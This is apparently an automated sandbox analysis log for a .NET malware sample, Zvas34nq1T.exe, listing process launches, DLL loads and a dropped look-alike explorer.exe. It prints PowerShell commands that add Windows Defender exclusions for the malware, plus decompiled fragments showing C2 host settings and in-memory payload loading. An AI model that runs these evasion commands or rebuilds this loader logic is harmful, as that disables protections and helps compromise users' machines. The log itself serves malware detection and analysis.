            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: explorer.lnk.0.drLNK file: ..\..\..\..\..\explorer.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Zvas34nq1T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Zvas34nq1T.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: Zvas34nq1T.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Zvas34nq1T.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Zvas34nq1T.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: explorer.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: explorer.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: explorer.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: Zvas34nq1T.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: Zvas34nq1T.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: Zvas34nq1T.exe, Messages.cs.Net Code: Memory
            Source: explorer.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: explorer.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: explorer.exe.0.dr, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeCode function: 0_2_00007FFD9B898294 push ebp; retf 0_2_00007FFD9B8982A8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B958DB0 push eax; ret 1_2_00007FFD9B958DB1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B952316 push 8B485F94h; iretd 1_2_00007FFD9B95231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B78D2A5 pushad ; iretd 4_2_00007FFD9B78D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B972E11 push esi; ret 4_2_00007FFD9B9730CA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B972E11 push 6078C356h; ret 4_2_00007FFD9B97332A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B972E11 push edi; ret 4_2_00007FFD9B973582
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B973580 push edi; ret 4_2_00007FFD9B973582
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9725A8 push ebx; ret 4_2_00007FFD9B9725C2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B972316 push 8B485F92h; iretd 4_2_00007FFD9B97231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B76D2A5 pushad ; iretd 9_2_00007FFD9B76D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B952316 push 8B485F94h; iretd 9_2_00007FFD9B95231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B78D2A5 pushad ; iretd 11_2_00007FFD9B78D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8A1183 push E95C9F05h; ret 11_2_00007FFD9B8A1239
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B972316 push 8B485F92h; iretd 11_2_00007FFD9B97231B
